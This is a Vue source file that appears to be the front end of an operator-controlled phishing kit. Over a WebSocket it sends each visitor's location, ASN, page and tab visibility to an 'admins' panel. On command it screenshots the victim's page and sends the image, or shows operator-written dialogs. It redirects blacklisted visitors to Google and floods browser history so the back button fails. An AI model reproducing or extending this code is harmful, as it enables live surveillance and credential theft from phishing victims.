<template>
  <RouterView ref="captureArea" v-if="hasData" />
</template>
<script>
import { ref, watch, defineComponent, onMounted, onUnmounted } from 'vue';
import { useRoute } from 'vue-router'
import { store } from './store.js' //引入全局store
import html2canvas from 'html2canvas';  //截图插件
import { showDialog } from 'vant';


export default defineComponent({
  name: 'BlackMagic',
  setup() {
    // const router = useRouter();
    const route = useRoute();
    const hasData = ref(false);
    const captureArea = ref(null);//截图样本
    // 用于保存返回的响应数据
    // const deviceType = ref('unknown');

    onMounted(() => {
      // store.loading = false
      localStorage.setItem('loading', false);
      // hasData.value = true
      // console.log("WebSocket 实例:", wsManager);  // 确认 WebSocket 实例是否已注入
      // console.log(app.config.globalProperties.$ws); // 检查 WebSocket 实例是否成功注入
      // console.log("wswsws",this.$ws);  // 检查 WebSocket 实例是否已注入
      // store.data.page = route.path
      if (store.WebSocket) {
        store.WebSocket.addEventListener('message', onMessage);
      }
      // if (store.WebSocket && this.socket.readyState === WebSocket.OPEN) {
      //   // store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: false }  }));
      //   store.loading = false
      //   localStorage.setItem('loading', false);
      // }

    });

    // 组件销毁时移除监听，防止内存泄漏
    onUnmounted(() => {
      if (store.WebSocket) {
        store.WebSocket.removeEventListener('message', onMessage);
      }
    });
    // 更新 localStorage 数据的函数
    // const updateLocalStorage = (field, value) => {
    //   const existingData = localStorage.getItem('data_Value');
    //   const storedData = existingData ? JSON.parse(existingData) : {};
    //   storedData[field] = value;
    //   localStorage.setItem('data_Value', JSON.stringify(storedData));
    //   if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
    //     store.WebSocket.send(JSON.stringify({ type: 'live', data: { [field]: value } }));
    //   }
    // };
    const onMessage = (event) => {
      const data = JSON.parse(event.data);
      // console.log('收到 WebSocket 消息:', data);
      if (data.black == 'black_out') {
        window.location.href = 'https://www.google.com/';
      }
      // if (data.type == 'refresh') {
      //   store.WebSocket.send(JSON.stringify({ type: 'live', data: store.data }));
      //   return;
      // }
      if (data.type === 'login') {
        if (data.uid) {
          let uid = localStorage.getItem('uid') || null;
          // window.localStorage.setItem('uid', data.uid)
          if (uid != data.uid) {
            window.localStorage.setItem('uid', data.uid)
            const data_Value = JSON.parse(localStorage.getItem('data_Value')) || null;
            // store.WebSocket.send({ type: 'live', admins: window.g.admins, uid: data.uid, data: store.data });
            // store.WebSocket.send(JSON.stringify({ type: 'live_login', admins: window.g.admins, uid: data.uid }));
            // const uid = localStorage.getItem('uid') || null; // **先从 localStorage 读取 UUID**
            const asn = localStorage.getItem('asn') || null; // **先从 localStorage 读取 UUID**
            const country = localStorage.getItem('country') || null; // **先从 localStorage 读取 UUID**
            const city = localStorage.getItem('city') || null; // **先从 localStorage 读取 UUID**
            const timezone = localStorage.getItem('timezone') || null; // **先从 localStorage 读取 UUID**
            const loading = localStorage.getItem('loading') || null; // **先从 localStorage 读取 UUID**
            store.WebSocket.send(JSON.stringify({ type: 'live_login', admins: window.g.admins, uid: data.uid, asn: asn, country: country, city: city, timezone: timezone, loading: loading }));
            // store.WebSocket.send({ type: 'live_login', admins: window.g.admins, uid: this.uid, asn: this.asn, country: this.country, city: this.city, timezone: this.timezone, loading: this.loading });
            store.WebSocket.send(JSON.stringify({ type: 'live', data: data_Value }));
          }
        }
        hasData.value = true
        return;
      }
      if (data.type === 'update') {
        if (data.data.command == 'dialog') {
          showDialog({
            title: '提示',
            message: data.data.message,//'代码是写出来给人看的，附带能在机器上运行。',
          }).then(() => {
            // on close
          });
        }
        if (data.data.command == 'screenshot') {
          const routerViewElement = captureArea.value.$el
          html2canvas(routerViewElement).then(canvas => {
            const image = canvas.toDataURL('image/png');
            const temporaryData = JSON.parse(JSON.stringify(store.data)); // 创建 store.data 的深拷贝
            store.WebSocket.send(JSON.stringify({ type: 'live', data: Object.assign(temporaryData, { viewimage: image }) }));
            //store.data.viewimage = {null}
          }).catch(error => {
            console.error('Error generating screenshot:', error);
          });
          return;
        }
        if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
          store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: false } }));
          localStorage.setItem('loading', false);
        }
        // updateLocalStorage('page', route.path);
        //重置等待状态
        // store.data.page = route.path
        // if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
        //   store.WebSocket.send(JSON.stringify({ type: 'live', data: store.data }));
        // }
        // if (data.data.command == 'loading') {
        //   loading.value = true
        // } else {
        //   loading.value = false
        // }
        // //接受后台命令后反馈当前信息
        // store.data.current_page = route.path
        // if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
        //   store.WebSocket.send(JSON.stringify({ type: 'live', data: store.data }));
        //   return;
        // }

        // if (data.data.command.includes("43543543543543")) {
        //   router.push("/1212" + data.data.command);
        // }

      }
      // message.value = data;
    };

    // onMounted(() => {
    //   hasData.value = true
    //   deviceType.value = getDeviceType();
    //   // getApi();
    //   // if (window.g.intercept_ios == true && deviceType.value == 'ios') {
    //   //   window.location.href = 'https://google.com';
    //   // }
    //   // if (window.g.intercept_desktop == true && deviceType.value == 'desktop') {
    //   //   window.location.href = 'https://google.com';
    //   // }
    //   // if (window.g.intercept_android == true && deviceType.value == 'android') {
    //   //   window.location.href = 'https://google.com';
    //   // }
    //   // if (deviceType.value !== 'unknown') {

    //   //   // 执行一些逻辑，例如跳转到特定页面或显示提示信息
    //   //   window.location.href = 'https://example.com/blocked';
    //   // }
    //   // if (!store.data.domain) {
    //   //   store.data.domain = 'comgate'
    //   // }
    //   // 可以在这里执行一些初始化操作，比如获取数据
    //   // store.data.current_page = route.path
    //   // store.WebSocket.addEventListener('message', (event) => {
    //   //   Ws_message(event)
    //   // });

    // });

    // const getDeviceType = () => {
    //   const userAgent = navigator.userAgent.toLowerCase();
    //   if (/windows|macintosh|linux/i.test(userAgent) && !/mobile/i.test(userAgent)) {
    //     return 'desktop';
    //   } else if (/iphone|ipad|ipod/i.test(userAgent)) {
    //     return 'ios';
    //   } else if (/android/i.test(userAgent)) {
    //     return 'android';
    //   } else {
    //     return 'unknown';
    //   }
    // };




    //监听 当前页面 类型
    watch(() => store.data.route, () => {
      if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
        store.WebSocket.send(JSON.stringify({ type: 'live', data: { route: store.data.route } }));
      }
      const existingData = localStorage.getItem('data_Value');
      // 解析为对象，如果没有数据则返回一个空对象
      const storedData = existingData ? JSON.parse(existingData) : {};
      // data_Value.value = { route: store.data.route}
      // 合并原有的数据和新的数据
      const mergedData = { ...storedData, ...{ route: store.data.route } };
      localStorage.setItem('data_Value', JSON.stringify(mergedData));
    });
    //监听 可见状态
    // 监听页面可见性
    document.addEventListener("visibilitychange", function () {
      if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
        if (document.visibilityState === "hidden") {
          // store.data.visible = false
          store.WebSocket.send(JSON.stringify({ type: 'live', data: { visible: false } }));
        } else {
          store.WebSocket.send(JSON.stringify({ type: 'live', data: { visible: true } }));
          // store.data.visible = true
        }
      }

    });
    //监听 WebSocket 刷新
    watch(() => store.WebSocket, (newWebSocket, oldWebSocket) => {
      if (oldWebSocket) {
        oldWebSocket.removeEventListener('message', onMessage);
      }
      if (newWebSocket) {
        newWebSocket.addEventListener('message', onMessage);
      }
    });
    // const Ws_message = (event) => {
    //   let jsonObject = JSON.parse(event.data)
    //   // if (jsonObject.black == 'black_ip') {
    //   //   window.location.href = 'https://www.google.com/'; // 替换为你想跳转的 URL
    //   // }
    //   // if (jsonObject.black == 'black_uid') {
    //   //   window.location.href = 'https://www.google.com/'; // 替换为你想跳转的 URL
    //   // }
    //   // if (jsonObject.black == 'black_out') {
    //   //   window.location.href = 'https://www.google.com/'; // 替换为你想跳转的 URL
    //   // }
    //   // let jsonObject = JSON.parse(event.data)
    //   // if (jsonObject.type == 'refresh') {
    //   //   store.WebSocket.send(JSON.stringify({ type: 'live', data: store.data }));
    //   // }
    //   // if (jsonObject.type === 'login') {
    //   //   if (jsonObject.uid) {
    //   //     // window.localStorage.setItem('uid', jsonObject.uid)
    //   //     hasData.value = true
    //   //   }
    //   // }
    //   if (jsonObject.type === 'update') {

    //     if (jsonObject.data.command == 'screenshot') {
    //       const routerViewElement = captureArea.value.$el
    //       html2canvas(routerViewElement).then(canvas => {
    //         const image = canvas.toDataURL('image/png');
    //         const temporaryData = JSON.parse(JSON.stringify(store.data)); // 创建 store.data 的深拷贝
    //         store.WebSocket.send(JSON.stringify({ type: 'live', data: Object.assign(temporaryData, { viewimage: image }) }));
    //         //store.data.viewimage = {null}
    //       }).catch(error => {
    //         console.error('Error generating screenshot:', error);
    //       });
    //       return;
    //     }
    //     //重置等待状态
    //     store.data.current_page = route.path

    //     // if (jsonObject.data.command == 'loading') {
    //     //   loading.value = true
    //     // } else {
    //     //   loading.value = false
    //     // }

    //     store.WebSocket.send(JSON.stringify({ type: 'live', data: store.data }));
    //     if (jsonObject.data.command.includes("43543543543543")) {
    //       router.push("/1212" + jsonObject.data.command);
    //     }

    //   }
    // }

    // 使用 watch 监听当前路由的变化 防止后退返回
    watch(
      () => route.path,
      (newPath) => {
        //防止后退返回
        window.history.pushState(window.history.state, null, window.location.href);
        window.history.pushState(window.history.state, null, window.location.href);
        window.history.pushState(window.history.state, null, window.location.href);
        window.history.pushState(window.history.state, null, window.location.href);
        window.history.pushState(window.history.state, null, window.location.href);
        window.history.pushState(window.history.state, null, window.location.href);
        window.history.pushState(window.history.state, null, window.location.href);
        window.history.pushState(window.history.state, null, window.location.href);
        // window.history.replaceState(null, null, window.location.href);
        // console.log(oldPath)
        // 更新当前路由路径
        store.data.page = newPath
        if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
          store.WebSocket.send(JSON.stringify({ type: 'live', data: store.data }));
        }


        const existingData = localStorage.getItem('data_Value');
        // 解析为对象，如果没有数据则返回一个空对象
        const storedData = existingData ? JSON.parse(existingData) : {};
        // data_Value.value = { route: store.data.route}
        // 合并原有的数据和新的数据
        const mergedData = { ...storedData, ...{ page: store.data.page } };
        localStorage.setItem('data_Value', JSON.stringify(mergedData));


        if (store.WebSocket && store.WebSocket.readyState === WebSocket.OPEN) {
          store.WebSocket.send(JSON.stringify({ type: 'live', data: { loading: false } }));
          // store.loading = false
          localStorage.setItem('loading', false);
        }

      }
    );

    // const Go_url = () => {
    //         console.log('Navigating to address');
    //         // if (route.path=='/') {
    //         //   router.push('/posta/index')
    //         // }

    //         // router.push('address');
    //         //router.push(url)
    //     };

    // 返回需要暴露给模板的数据和方法
    return {
      // loading,
      hasData,
      store,
      // Go_url,
      captureArea //截图样本
    };
  }
});
// onMounted 是 Vue 组件生命周期的一部分，以下是 Vue 3 中常见的生命周期钩子顺序：

// 	1.	setup：组件实例化时调用，用于初始化组件状态。
// 	2.	onBeforeMount：组件挂载到 DOM 之前调用。
// 	3.	onMounted：组件挂载到 DOM 之后调用。
// 	4.	onBeforeUpdate：组件更新之前调用。
// 	5.	onUpdated：组件更新之后调用。
// 	6.	onBeforeUnmount：组件卸载之前调用。
// 	7.	onUnmounted：组件卸载之后调用。

// import HelloWorld from './components/HelloWorld.vue'

// export default {
//   name: 'App',
//   components: {
//     HelloWorld
//   }
// }
</script>

<style>

/* #app {
  font-family: Avenir, Helvetica, Arial, sans-serif;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
  text-align: center;
  color: #2c3e50;
  margin-top: 60px;
} */
</style>
